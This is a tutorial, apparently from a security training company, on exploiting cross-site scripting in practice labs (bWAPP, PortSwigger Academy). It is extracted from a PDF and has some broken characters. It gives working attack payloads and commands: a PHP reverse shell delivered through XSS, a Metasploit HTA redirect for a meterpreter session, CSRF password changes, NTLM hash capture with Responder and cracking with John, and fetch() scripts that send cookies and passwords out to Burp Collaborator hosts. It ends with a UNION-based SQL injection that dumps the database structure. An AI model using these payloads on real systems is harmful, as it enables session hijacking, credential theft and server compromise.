Cross-Site Scrip�ng Exploita�on

1|Page
 Cross-Site Scripting Exploitation

Contents
Introduc�on ............................................................................................................................................ 3
Introduc�on to Cross-Site Scrip�ng ........................................................................................................ 3
Blind XSS .................................................................................................................................................. 3
XSS through File Upload .......................................................................................................................... 4
Reverse Shell with XSS ............................................................................................................................ 6
System Exploita�on Over XSS ................................................................................................................. 7
CSRF with XSS .......................................................................................................................................... 9
NTLM Hash Capture with XSS ............................................................................................................... 12
Session Hijacking with Burp Collaborator Client ................................................................................... 15
Introducing Burp Collaborator Client ................................................................................................ 15
Inject Blind XSS Payload in Comment Sec�on................................................................................... 17
Hijack the Session ............................................................................................................................. 18
Creden�al Capturing with Burp Collaborator ....................................................................................... 20
XSS to SQL Injec�on .............................................................................................................................. 25

2|Page
 Cross-Site Scripting Exploitation

Introduction
“Are you one of them, who thinks that Cross-Site Scripting is just for some errors or pop-ups on the
screen?” Yes?? Then today in this ar�cle, you’ll see how an XSS suffering web-page is not only
responsible for the defacement of the web-applica�on but also, it could disrupt a visitor’s privacy by
sharing the login creden�als or his authen�cated cookies to an atacker without his/her concern.

I recommend, to revisit our previous ar�cle for beter understanding, before going deeper with the
atack scenarios implemented in this sec�on.

Introduction to Cross-Site Scripting

Cross-Site Scrip�ng is a client-side code injec�on atack where malicious scripts are injected into
trusted websites.

In this atack, the users are not directly targeted through a payload, although the atacker shoots
the XSS vulnerability by inser�ng a malicious script into a web page that appears to be a genuine
part of the website. So, when any user visits that website, the XSS suffering web-page will deliver the
malicious JavaScript code directly over to his browser without his knowledge.

“XSS” thus has been classified into three main categories:

• Stored XSS
• Reflected XSS
• DOM-based XSS

I guess you’re now having a clear vision about - “What is XSS” and “How it occurs”. So let’s try to
exploit the vulnerable labs over The Portswigger Academy and bWAPP in order to capture up the
authen�cated cookie of the users and the server’s remote shell.

But before making our hands wet with the exploits, let’s understand what is Blind XSS?

Blind XSS
Many �mes the atacker does not know where the payload will end up and if, or when, it will get
executed and even there are �mes when the injected payload is executed in a different environment
i.e. either by the administrator or by someone else.

So, in order to exploit such vulnerabili�es - He blindly deploys up the series of malicious payloads
over onto the web-applica�ons, and thus the applica�on stores them into the database. Thereby, he
thus waits, un�l the user pulls the payload out from the database and renders it up into his/her
browser.

Let’s Start !!

3|Page
 Cross-Site Scripting Exploitation

XSS through File Upload

Web-applica�ons somewhere or the other allow its users to upload a file, whether its an image, a
resume, a song, or anything specific. And with every upload, the name reflects back on the screen as
it was called from the HTML code.

As the name appears back, therefore we can now execute any JavaScript code by simply
manipula�ng up the file name with any XSS payload.

"><img src=x onerror=prompt(1)>

4|Page
 Cross-Site Scripting Exploitation

Boot back into the bWAPP’s applica�on by selec�ng the “Choose your bug” op�on to “Unrestricted
File Upload” and for this �me we’ll keep the security to “High”.

Let’s now upload our renamed file over into the web-applica�on, by browsing it from the directory.

Great!! From the above image, you can see that our file name is over on the screen. So as we hit the
Upload buton, the browser will execute up the embedded JavaScript code and we’ll get the
response.

5|Page
 Cross-Site Scripting Exploitation

Reverse Shell with XSS

Genera�ng a pop-up or redirec�ng a user to some different applica�on with the XSS vulnerability is
somewhere or the other seems to be harmless. But what, if the atacker is able to capture up a
reverse shell, will It s�ll be harmless? Let’s see how we could do this.

Fire up your Kali terminal and then create up a reverse-php payload by calling it from webshells
directory as

cp /usr/share/webshells/php/php-reverse-shell.php /root/Desktop/ReverseXSS.php

Now, in order to capture the remote shell, let’s manipulate the $ip parameter with the Kali machine’s
IP

Back into the vulnerable applica�on, let’s opt the “Unrestricted File Upload” and then further we’ll
include the ReverseXSS.php file.

Don’t forget to copy the Uploaded URL, i.e. right-click on the Upload button and choose the Copy Link
Location.

6|Page
 Cross-Site Scripting Exploitation

Great!! We’re almost done, �me to inject our XSS payload. Now, with the “Choose you bug” op�on,
opt the XSS – Stored (Blog).

Over into the comment sec�on, type your JavaScript payload with the “File-Upload URL”.

But wait!! Before firing the submit buton, let’s start our Netcat listener

nc –lvp 1234

Cool!! From the image below, you can see that, we are into our targeted web-server.

I’m sure you might be wondering - Why I made a round trip in order to capture up the Reverse Shell
when I’m having the “File Upload” vulnerability open?

Okay!! So, think for a situation, if you upload the file directly and you’ve successfully grabbed up the
Reverse shell. But wait!! Over in the victim’s network, your IP is disclosed and you’re almost caught or
what if your Ip address is not whitelisted. Then?

Over in such a situation, taking the round trip is the most preferable option, as you’ll get the reverse
connection into the victim’s server through the authorized user.

System Exploitation Over XSS

In the last sec�on, we captured the reverse shell, but what, if rather than the server’s shell, the
attacker managed to get up the meterpreter session of the visitor who surfs this vulnerable web-
page?

7|Page
 Cross-Site Scripting Exploitation

Let’s check it out how – To make it more clear we’re having:

Atacker’s machine: Kali Linux

Vulnerable Web-applica�on: bWAPP(bee-box)

Visitor’s machine: Windows

So, the atacker first creates up an hta file i.e. an HTML Applica�on over with the Metasploit
framework, that when opened by the vic�m will thus execute up a payload via Powershell.

use exploit/windows/misc/hta_server
set srvhost 192.168.0.12
exploit

Great!! He got the payload URL, now what he does is, he simply embed it into the XSS suffering web-
page and will wait for the visitor.

<script>window.location='http://192.168.0.12:8080/zV9q9x7Tvl0.hta'</script>

Now, whenever any visitor visits this web-page, the browser will thus execute the malicious script
and will download the HTA file over into his machine.

8|Page
 Cross-Site Scripting Exploitation

Cool!! From the above image, you can see that the file has been downloaded into the system. Now,
as soon as the vic�m boots it up to check out what it is, there on the other side, the atacker will get
his meterpreter session.

CSRF with XSS

Wouldn't it great, if you’re able to manipulate the password of the user or the registered email
address with your own, without his concern?

Web-applica�ons that are suffering from XSS and CSRF vulnerability permits you to do so.

Boot inside the vulnerable web-applica�on bWAPP as bee: bug, further select “CSRF (Change
Password)” from the “Choose your bug” op�on.

This selec�on will thus redirect you to a CSRF suffering web-page, where there is an op�on to
change the account password.

9|Page
 Cross-Site Scripting Exploitation

So as we enter or sets up a new password, the passing value thus reflects back into the URL as the
password is changed to “12345”.

Copy the password URL and manipulate the password_new and the password_conf values to the
one which we want to set for the visitor. As in our case, I made it to “ignite”.

http://192.168.0.14/bWAPP/csrf_1.php?password_new=ignite&password_conf=ignite&action=change
Now, its �me to inject our script into the XSS suffering web-page with the “image” tag.

<img
src=”http://192.168.0.14/bWAPP/csrf_1.php?password_new=ignite&password_conf=ignite&action=chan
ge”>

Now, let’s consider a visitor is surfing the website and he visits this vulnerable sec�on. As soon as he
do so, the browser executes the javascript embedded payload and will consider it as a genuine
request by the visitor i.e. it will change the password to “ignite”.

10 | P a g e
 Cross-Site Scripting Exploitation

Great!! He did that, now whenever he logs in again with his old password, he won’t be able to as his
password has been changed without his concern.

But the atacker can log in into the account, as he is having the new password i.e. “ignite”.

11 | P a g e
 Cross-Site Scripting Exploitation

NTLM Hash Capture with XSS

An XSS vulnerability is o�en known for its pop-ups, but some�mes atacker manipulates these pop-
up in order to catch up sensi�ve data of the users i.e. session cookies, account creden�als or
whatever they wish to.

Here an atacker thus tries to capture the NTLM hashes of the visitors by injec�ng his malicious
Javascript code into the vulnerable applica�on.

In order to carry this up, he enables up the “Responder” over in his atacking machine, which will
thus grab up all the authen�cated NTLM hashes.

responder –I eth0

Further, he simply injects his malicious script into the XSS suffering web-page with an “iframe”

12 | P a g e
 Cross-Site Scripting Exploitation

<iframe src=http://192.168.0.12/scriptlet.html <

Cool!! Its �me to wait for the visitor. Now as the visitor visits this web-page he got encountered with
a pop-up asking for the creden�als.

13 | P a g e
 Cross-Site Scripting Exploitation

As soon as he enters his system creden�als, the web-page thus reloads and the atacker will have his
NTLM hash.

It’s not the end. He needs to crack this up. Therefore over in the new terminal, he directed himself to
the directory where the hash is stored.

cd /usr/share/responder/logs

Further, he makes up a new password file as “pass.txt”

Great!! His work is done now. He simply embeds the password file and the hash file over into “John
The Ripper” and there he’ll get the authorized session.

john --wordlist=pass.txt HTTP-NTLMv2-192.168.0.9.txt

14 | P a g e
 Cross-Site Scripting Exploitation

Session Hijacking with Burp Collaborator Client

As in our previous ar�cle, we were stealing cookies, but, impersona�ng as an authen�cated user,
where we’ve kept our netcat listener “ON” and on the other side we logged in as a genuine user.

But in the real-life scenarios, things don’t work this way, there are �mes when we could face blind
XSS i.e. we won’t know when our payload will get executed.

Introducing Burp Collaborator Client

Thus, in order to exploit this Blind XSS vulnerability, let’s check out one of the best burpsuite’s
plugins i.e. the “Burp Collaborator Client”

Don’t know what Burp Collaborator is? Follow up this sec�on, and I’m sure you’ll get the basic
knowledge about it.

Login into the PortSwigger academy and drop down �ll Cross-Site Scrip�ng and further get into its
“Exploi�ng cross-site scrip�ng vulnerabili�es”, choose the first lab as “Exploi�ng cross-site scrip�ng
to steal cookies” and hit “Access the lab” buton.

Here you’ll now be redirected to blog. As to go further, I’ve opened a post there and checked out for
its content.

While scrolling down, over at the botom, I found a comment sec�on, which seems to have mul�ple
input fields, i.e. there is a chance that we could have an XSS vulnerability exists.

15 | P a g e
 Cross-Site Scripting Exploitation

Now its �me to bring “Burp Collaborator Client” in the picture. Tune in your “Burpsuite” and there
on the le�-hand side click on “Burp”, further then opt the “Burp Collaborator Client”.

Over into the Collaborator Client window, at the “Generate Collaborator payloads” sec�on, hit the
Copy to clipboard buton which will thus copy a payload for you.

16 | P a g e
 Cross-Site Scripting Exploitation

Inject Blind XSS Payload in Comment Section

Cool!! Now, come back to the “Comment Sec�on” into the blog, enter the following script with your
Burp Collaborator payload:

<script>
fetch('https://qgafu1gvgx5psspo9o4iz1e2ttzond.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>

Great!! From the image below, you can see that our comment has been posted successfully.

17 | P a g e
 Cross-Site Scripting Exploitation

Time to wait!! Click on the Poll buton in order to grab up the payload-interac�on result.

Oops!! We got a long list, select the HTTP one and check its “Response”. From the below image you
can see that in the response sec�on we’ve got a “Session Id”. Copy it for now !!

Hijack the Session

Now, back into the browser, configure your proxy and over in the burpsuite turn you Intercept “ON”.

Reload the page and check the intercepted Request.

18 | P a g e
 Cross-Site Scripting Exploitation

Great!! We’re having a Session ID here too, simply manipulate it up with the one we copied earlier
from the collaborator.

Hit the Forward buton, and check what the web-applica�on offers you.

19 | P a g e
 Cross-Site Scripting Exploitation

Credential Capturing with Burp Collaborator

Why capture up the session cookies, if you could get the username & passwords directly??

Similar to the above sec�on, it’s not necessary, that our payload will execute over at the same place,
where it was injected.

Let’s try to capture some creden�als over as in some real-life situa�on, where the web-page is
suffering from the Stored XSS vulnerability.

Back into the PortSwigger account choose the next defacement as “Exploi�ng cross-site scrip�ng to
capture passwords”.

As we hit “Access the Lab”, we’ll get redirected to the XSS suffering web-page. To enhance more, I’ve
again opened up a blogpost there.

20 | P a g e
 Cross-Site Scripting Exploitation

Scrolling the page again, I got encountered with the same “comment sec�on.” Let’s exploit it out
again.

Back into the “Burp Collaborator”, let’s Copy the payload again by hi�ng “Copy to Clipboard”.

All we needed was that payload only, now inject the comment field with the following XSS payload.

<input name=username id=username>

<input type=password name=password
onchange="if(this.value.length)fetch('https://5iojzt7m7e9217idp6s700vah1nsbh.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">

21 | P a g e
 Cross-Site Scripting Exploitation

Let’s hit the “Post Comment” to check whether it is working or not. The below image clears up that
our comment has been posted successfully.

Now let’s wait over into the “burp Collaborator” for the results. From the below image you can see
that our payload has been executed at some point.

Let’s check who did that.

22 | P a g e
 Cross-Site Scripting Exploitation

Oops!! It’s the administrator, we’re having some creden�als.

But where could we use them?

Over at the top of the blog, there was an account login sec�on, let’s check it there.

Cool!! Let’s try to make a dry run over here. Tune in your proxy and capture up the ongoing HTTP
Request.

23 | P a g e
 Cross-Site Scripting Exploitation

Okay!! Let’s manipulate the username and password with the one we captured earlier in the Burp
Collaborator.

Great!! Now simply hit the Forward buton and there you go….

24 | P a g e
 Cross-Site Scripting Exploitation

XSS to SQL Injection

So up �ll now, we were only discussing how an atacker could capture up the authen�cated cookies,
the visitor’s creden�als and even the server’s remote shell. But what if I say that he can even dump
the complete database of the web-application over in the single pop-up? Wonder how? Let’s find it
out in this sec�on.

Over in the vulnerable applica�on, the atacker was encountered with a webpage which was
suffering from the SQL Injec�on vulnerability.

Therefore, in order to grab up the result more precise, he checked the total number of columns with
the “order by” clause.

http://192.168.0.14/bWAPP/sqli_1.php?title=’order by 7--+&action=search

25 | P a g e
 Cross-Site Scripting Exploitation

As he was then confirmed by the total columns, he thus used the UNION operator with the SELECT
query.

http://192.168.0.14/bWAPP/sqli_1.php?title=’ union select 1,2,3,4,5,6,7--+&action=search

Great!! This was all he wanted, the printed value. From the above image, you can see that “2” has
been displayed on the screen.

It’s �me to check this for XSS. But he can’t inject his Javascript code like the same he used to,
therefore he’ll thus convert it all into the “HEX string” and then he’ll manipulate “2” with the hex-
value.

0x3c7363726970743e616c657274282253514c20496e6a656374696f6e207669612058535322293c2f7363
726970743e

26 | P a g e
 Cross-Site Scripting Exploitation

Cool!! It's working. Now he can add any script, whether it is for cookie capturing or the remote shell
one. But for this time, he’ll dump up the database, its tables and the fields.

http://192.168.0.14/bWAPP/sqli_1.php?title=%27%20union%20select%201,concat(0x3c7363726970743
e616c657274282249474e49544520544543484e4f4c4f47494553,0x5c6e,(concat(@x:=0x00,(SELECT%20c
ount(*)from%20information_schema.columns%20where%20table_schema=database()%20and%20@x:=c
oncat(@x,0x5c6e,database(),0x20207c2020,table_name,0x20207c2020,column_name)),@x)),0x22293c2f
7363726970743e),3,4,5,6,7--+&action=search

27 | P a g e
 Cross-Site Scripting Exploitation

Great!! From the below image, you can see that the complete database structure has been
presented in front of us.

To learn more about Website Hacking. Follow this Link.

28 | P a g e
 JOIN OUR
TRAINING PROGRAMS
H ERE
CLICK BEGINNER

Bug Bounty Network Security

Ethical Hacking Essentials

Network Pentest
Wireless Pentest

ADVANCED

Burp Suite Pro Web Pro Computer

Services-API Infrastructure VAPT Forensics

Advanced CTF
Android Pentest Metasploit

EXPERT

Red Team Operation

Privilege Escalation
APT’s - MITRE Attack Tactics
Windows
Active Directory Attack
Linux
MSSQL Security Assessment

www.ignitetechnologies.in